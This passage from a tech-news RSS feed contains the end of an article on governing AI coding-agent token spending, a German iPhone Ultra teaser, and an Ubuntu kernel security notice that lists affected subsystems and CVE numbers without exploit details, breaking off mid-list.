<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone Ultra: Unstimmigkeiten über Apples Zeitplan]]></title>
<description><![CDATA[Eigentlich gehen wir von einem Start des iPhone Ultra parallel zum iPhone 18 Pro im Herbst 2026 aus. Ein Bericht nimmt nun erneut vermeintliche Unstimmigkeiten ... Weiterlesen ...
Der Beitrag iPhone Ultra: Unstimmigkeiten über Apples Zeitplan erschien zuerst auf Apfelpage.]]></description>
<link>https://tsecurity.de/de/3691447/ios-mac-os/iphone-ultra-unstimmigkeiten-ueber-apples-zeitplan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691447/ios-mac-os/iphone-ultra-unstimmigkeiten-ueber-apples-zeitplan/</guid>
<pubDate>Fri, 24 Jul 2026 14:00:52 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img width="1088" height="713" src="https://www.apfelpage.de/wp-content/uploads/2026/02/Gemini_Generated_Image_b6ewfwb6ewfwb6ew-e1770111674979.png" class="type:primaryImage wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.apfelpage.de/wp-content/uploads/2026/02/Gemini_Generated_Image_b6ewfwb6ewfwb6ew-e1770111674979.png 1088w, https://www.apfelpage.de/wp-content/uploads/2026/02/Gemini_Generated_Image_b6ewfwb6ewfwb6ew-e1770111674979-570x374.png 570w, https://www.apfelpage.de/wp-content/uploads/2026/02/Gemini_Generated_Image_b6ewfwb6ewfwb6ew-e1770111674979-768x503.png 768w" sizes="(max-width: 1088px) 100vw, 1088px"></figure>
<p>Eigentlich gehen wir von einem Start des iPhone Ultra parallel zum iPhone 18 Pro im Herbst 2026 aus. Ein Bericht nimmt nun erneut vermeintliche Unstimmigkeiten ... <a title="iPhone Ultra: Unstimmigkeiten über Apples Zeitplan" class="read-more" href="https://www.apfelpage.de/news/iphone-ultra-unstimmigkeiten-ueber-apples-zeitplan/" aria-label="Mehr Informationen über iPhone Ultra: Unstimmigkeiten über Apples Zeitplan">Weiterlesen ...</a></p>
<p>Der Beitrag <a href="https://www.apfelpage.de/news/iphone-ultra-unstimmigkeiten-ueber-apples-zeitplan/">iPhone Ultra: Unstimmigkeiten über Apples Zeitplan</a> erschien zuerst auf <a href="https://www.apfelpage.de/">Apfelpage</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8603-1: Linux kernel (Azure) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691319/unix-server/usn-8603-1-linux-kernel-azure-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691319/unix-server/usn-8603-1-linux-kernel-azure-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 13:02:31 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - x86 platform drivers;
  - PSP security protocol;
  - ARM32 architecture;
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Auxiliary display drivers;
  - Drivers core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - Buffer Sharing and Synchronization framework;
  - DPLL subsystem;
  - EDAC drivers;
  - Arm Firmware Framework for ARMv8-A(FFA);
  - EFI core;
  - FWCTL subsystem;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - I3C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - IOMMU subsystem;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Texas Instruments network drivers;
  - MediaTek network drivers;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - Parport drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - Remote Processor subsystem;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - Thunderbolt and USB4 drivers;
  - TTY drivers;
  - Userspace I/O drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Dual Role (OTG-ready) Controller drivers;
  - USB Serial drivers;
  - USB Type-C support driver;
  - USB Type-C Port Controller Manager driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - 9P distributed file system;
  - File systems infrastructure;
  - AFS file system;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - DRM TTM subsystem;
  - Codetag library;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - Memory management;
  - Tracing infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory Management;
  - KVM subsystem;
  - Linked list library;
  - Netfilter;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Network shaper API;
  - Network traffic control;
  - TCP network protocol;
  - XFRM subsystem;
  - User-space API (UAPI);
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - DMA mapping infrastructure;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - IRQ subsystem;
  - Kexec HandOver (KHO);
  - Locking primitives;
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Timer subsystem;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KProbes tracing;
  - KASAN memory debugging framework;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - Ethtool driver;
  - Handshake API;
  - HSR network protocol;
  - IPv4 networking;
  - IPv6 networking;
  - IUCV driver;
  - L2TP protocol;
  - MAC80211 subsystem;
  - Multipath TCP;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - Integrity Measurement Architecture(IMA) framework;
  - Key management;
  - Landlock security;
  - Linux Security Modules (LSM) Framework;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - AudioScience HPI driver;
  - Creative Sound Blaster X-Fi driver;
  - FourSemi audio codecs;
  - Texas InstrumentS Audio (ASoC/HDA) drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43490, CVE-2026-43491,
CVE-2026-43492, CVE-2026-43493, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43498, CVE-2026-43499, CVE-2026-43501,
CVE-2026-43502, CVE-2026-45834, CVE-2026-45835, CVE-2026-45836,
CVE-2026-45837, CVE-2026-45838, CVE-2026-45839, CVE-2026-45840,
CVE-2026-45841, CVE-2026-45842, CVE-2026-45843, CVE-2026-45844,
CVE-2026-45845, CVE-2026-45846, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45988, CVE-2026-45989, CVE-2026-45990, CVE-2026-45991,
CVE-2026-45994, CVE-2026-45995, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46001, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46008, CVE-2026-46009, CVE-2026-46010, CVE-2026-46011,
CVE-2026-46012, CVE-2026-46013, CVE-2026-46014, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46020,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46025, CVE-2026-46026, CVE-2026-46027, CVE-2026-46028,
CVE-2026-46029, CVE-2026-46030, CVE-2026-46031, CVE-2026-46032,
CVE-2026-46033, CVE-2026-46034, CVE-2026-46035, CVE-2026-46036,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46039, CVE-2026-46040,
CVE-2026-46041, CVE-2026-46042, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46045, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46054, CVE-2026-46056, CVE-2026-46057, CVE-2026-46058,
CVE-2026-46059, CVE-2026-46060, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46066,
CVE-2026-46067, CVE-2026-46068, CVE-2026-46069, CVE-2026-46070,
CVE-2026-46071, CVE-2026-46072, CVE-2026-46073, CVE-2026-46074,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46081, CVE-2026-46082,
CVE-2026-46083, CVE-2026-46084, CVE-2026-46085, CVE-2026-46086,
CVE-2026-46087, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46093, CVE-2026-46094,
CVE-2026-46095, CVE-2026-46096, CVE-2026-46097, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46100, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46104, CVE-2026-46105, CVE-2026-46106,
CVE-2026-46107, CVE-2026-46108, CVE-2026-46109, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46115, CVE-2026-46116, CVE-2026-46117, CVE-2026-46118,
CVE-2026-46119, CVE-2026-46120, CVE-2026-46121, CVE-2026-46122,
CVE-2026-46123, CVE-2026-46124, CVE-2026-46125, CVE-2026-46126,
CVE-2026-46127, CVE-2026-46128, CVE-2026-46129, CVE-2026-46130,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46134,
CVE-2026-46135, CVE-2026-46136, CVE-2026-46137, CVE-2026-46138,
CVE-2026-46139, CVE-2026-46140, CVE-2026-46141, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46147, CVE-2026-46148, CVE-2026-46149, CVE-2026-46150,
CVE-2026-46151, CVE-2026-46152, CVE-2026-46153, CVE-2026-46154,
CVE-2026-46155, CVE-2026-46156, CVE-2026-46157, CVE-2026-46158,
CVE-2026-46159, CVE-2026-46160, CVE-2026-46161, CVE-2026-46162,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46165, CVE-2026-46166,
CVE-2026-46167, CVE-2026-46168, CVE-2026-46169, CVE-2026-46170,
CVE-2026-46171, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46175, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46181, CVE-2026-46182,
CVE-2026-46183, CVE-2026-46184, CVE-2026-46185, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46188, CVE-2026-46189, CVE-2026-46190,
CVE-2026-46191, CVE-2026-46192, CVE-2026-46193, CVE-2026-46194,
CVE-2026-46195, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46202,
CVE-2026-46203, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46210,
CVE-2026-46211, CVE-2026-46212, CVE-2026-46213, CVE-2026-46214,
CVE-2026-46215, CVE-2026-46216, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46221, CVE-2026-46222, CVE-2026-46223,
CVE-2026-46224, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46228, CVE-2026-46229, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46232, CVE-2026-46233, CVE-2026-46234, CVE-2026-46235,
CVE-2026-46236, CVE-2026-46238, CVE-2026-46239, CVE-2026-46240,
CVE-2026-46241, CVE-2026-46242, CVE-2026-46243, CVE-2026-46244,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46275, CVE-2026-46276,
CVE-2026-46277, CVE-2026-46278, CVE-2026-46279, CVE-2026-46280,
CVE-2026-46281, CVE-2026-46282, CVE-2026-46283, CVE-2026-46284,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46288,
CVE-2026-46289, CVE-2026-46290, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46295, CVE-2026-46296,
CVE-2026-46297, CVE-2026-46298, CVE-2026-46299, CVE-2026-46301,
CVE-2026-46302, CVE-2026-46303, CVE-2026-46304, CVE-2026-46305,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46308, CVE-2026-46309,
CVE-2026-46310, CVE-2026-46311, CVE-2026-46312, CVE-2026-46313,
CVE-2026-46314, CVE-2026-46315, CVE-2026-46316, CVE-2026-46317,
CVE-2026-46318, CVE-2026-46319, CVE-2026-46320, CVE-2026-46321,
CVE-2026-46322, CVE-2026-46324, CVE-2026-46332, CVE-2026-52904,
CVE-2026-52905, CVE-2026-52906, CVE-2026-52907, CVE-2026-52911,
CVE-2026-52912, CVE-2026-52913, CVE-2026-52914, CVE-2026-52915,
CVE-2026-52916, CVE-2026-52918, CVE-2026-52919, CVE-2026-52920,
CVE-2026-52921, CVE-2026-52922, CVE-2026-52923, CVE-2026-52925,
CVE-2026-52926, CVE-2026-52927, CVE-2026-52928, CVE-2026-52931,
CVE-2026-52932, CVE-2026-52933, CVE-2026-52934, CVE-2026-52936,
CVE-2026-52937, CVE-2026-52941, CVE-2026-52943, CVE-2026-52944,
CVE-2026-52949, CVE-2026-52950, CVE-2026-52951, CVE-2026-52952,
CVE-2026-52953, CVE-2026-52954, CVE-2026-52955, CVE-2026-52956,
CVE-2026-52957, CVE-2026-52958, CVE-2026-52959, CVE-2026-52960,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52965, CVE-2026-52967, CVE-2026-52968, CVE-2026-52969,
CVE-2026-52970, CVE-2026-52971, CVE-2026-52973, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52976, CVE-2026-52977, CVE-2026-52978,
CVE-2026-52979, CVE-2026-52980, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52983, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52987, CVE-2026-52988, CVE-2026-52989, CVE-2026-52990,
CVE-2026-52991, CVE-2026-52992, CVE-2026-52993, CVE-2026-52994,
CVE-2026-52995, CVE-2026-52996, CVE-2026-52997, CVE-2026-52998,
CVE-2026-52999, CVE-2026-53000, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53005, CVE-2026-53006,
CVE-2026-53007, CVE-2026-53008, CVE-2026-53009, CVE-2026-53010,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53017, CVE-2026-53018,
CVE-2026-53019, CVE-2026-53020, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53024, CVE-2026-53025, CVE-2026-53026,
CVE-2026-53027, CVE-2026-53028, CVE-2026-53029, CVE-2026-53030,
CVE-2026-53031, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53038,
CVE-2026-53039, CVE-2026-53040, CVE-2026-53041, CVE-2026-53042,
CVE-2026-53043, CVE-2026-53044, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53051, CVE-2026-53052, CVE-2026-53053, CVE-2026-53054,
CVE-2026-53055, CVE-2026-53056, CVE-2026-53057, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53067, CVE-2026-53068, CVE-2026-53069, CVE-2026-53070,
CVE-2026-53071, CVE-2026-53072, CVE-2026-53073, CVE-2026-53074,
CVE-2026-53075, CVE-2026-53076, CVE-2026-53077, CVE-2026-53078,
CVE-2026-53079, CVE-2026-53080, CVE-2026-53081, CVE-2026-53082,
CVE-2026-53083, CVE-2026-53084, CVE-2026-53085, CVE-2026-53086,
CVE-2026-53087, CVE-2026-53088, CVE-2026-53089, CVE-2026-53090,
CVE-2026-53091, CVE-2026-53092, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53095, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53099, CVE-2026-53100, CVE-2026-53101, CVE-2026-53102,
CVE-2026-53103, CVE-2026-53104, CVE-2026-53105, CVE-2026-53106,
CVE-2026-53107, CVE-2026-53108, CVE-2026-53109, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53113, CVE-2026-53114,
CVE-2026-53115, CVE-2026-53116, CVE-2026-53117, CVE-2026-53118,
CVE-2026-53119, CVE-2026-53120, CVE-2026-53121, CVE-2026-53122,
CVE-2026-53123, CVE-2026-53124, CVE-2026-53125, CVE-2026-53126,
CVE-2026-53127, CVE-2026-53128, CVE-2026-53129, CVE-2026-53130,
CVE-2026-53174, CVE-2026-53277, CVE-2026-53278, CVE-2026-53279,
CVE-2026-53280, CVE-2026-53281, CVE-2026-53282, CVE-2026-53283,
CVE-2026-53284, CVE-2026-53285, CVE-2026-53286, CVE-2026-53287,
CVE-2026-53288, CVE-2026-53289, CVE-2026-53290, CVE-2026-53291,
CVE-2026-53292, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53297, CVE-2026-53298, CVE-2026-53299,
CVE-2026-53300, CVE-2026-53301, CVE-2026-53302, CVE-2026-53303,
CVE-2026-53304, CVE-2026-53305, CVE-2026-53306, CVE-2026-53307,
CVE-2026-53308, CVE-2026-53309, CVE-2026-53310, CVE-2026-53311,
CVE-2026-53312, CVE-2026-53313, CVE-2026-53314, CVE-2026-53315,
CVE-2026-53316, CVE-2026-53317, CVE-2026-53318, CVE-2026-53319,
CVE-2026-53320, CVE-2026-53321, CVE-2026-53322, CVE-2026-53323,
CVE-2026-53324, CVE-2026-53357, CVE-2026-53358, CVE-2026-53360,
CVE-2026-53364, CVE-2026-53365, CVE-2026-53367, CVE-2026-53368,
CVE-2026-53369, CVE-2026-53370, CVE-2026-53371, CVE-2026-53372,
CVE-2026-53373, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53377, CVE-2026-53378, CVE-2026-53379, CVE-2026-53380,
CVE-2026-63837, CVE-2026-63838, CVE-2026-63839, CVE-2026-63840,
CVE-2026-63841, CVE-2026-63842, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63849, CVE-2026-63850, CVE-2026-63851, CVE-2026-63852,
CVE-2026-63853, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63857, CVE-2026-63858, CVE-2026-63859, CVE-2026-63860,
CVE-2026-63861, CVE-2026-63862, CVE-2026-63863, CVE-2026-63864,
CVE-2026-63865, CVE-2026-63866, CVE-2026-63875, CVE-2026-63876,
CVE-2026-63877, CVE-2026-63878, CVE-2026-63879, CVE-2026-63880,
CVE-2026-63881, CVE-2026-63882, CVE-2026-63883, CVE-2026-63884,
CVE-2026-63886, CVE-2026-63887, CVE-2026-63888, CVE-2026-63889,
CVE-2026-63890, CVE-2026-63891, CVE-2026-63892, CVE-2026-63893,
CVE-2026-63894, CVE-2026-63895, CVE-2026-63896, CVE-2026-63897,
CVE-2026-63898, CVE-2026-63899, CVE-2026-63900, CVE-2026-63901,
CVE-2026-63902, CVE-2026-63903, CVE-2026-63904, CVE-2026-63905,
CVE-2026-63906, CVE-2026-63907, CVE-2026-63908, CVE-2026-63910,
CVE-2026-63911, CVE-2026-63912, CVE-2026-63913, CVE-2026-63914,
CVE-2026-63915, CVE-2026-63916, CVE-2026-63917, CVE-2026-63918,
CVE-2026-63919, CVE-2026-63920, CVE-2026-63921, CVE-2026-63922,
CVE-2026-63923, CVE-2026-63924, CVE-2026-63925, CVE-2026-63926,
CVE-2026-63927, CVE-2026-63928, CVE-2026-63929, CVE-2026-63930,
CVE-2026-63931, CVE-2026-63932, CVE-2026-63933, CVE-2026-63934,
CVE-2026-63935, CVE-2026-63936, CVE-2026-63937, CVE-2026-63938,
CVE-2026-63939, CVE-2026-63940, CVE-2026-63941, CVE-2026-63942,
CVE-2026-63943, CVE-2026-63944, CVE-2026-63945, CVE-2026-63946,
CVE-2026-63947, CVE-2026-63948, CVE-2026-63949, CVE-2026-63950,
CVE-2026-63951, CVE-2026-63952, CVE-2026-63953, CVE-2026-63954,
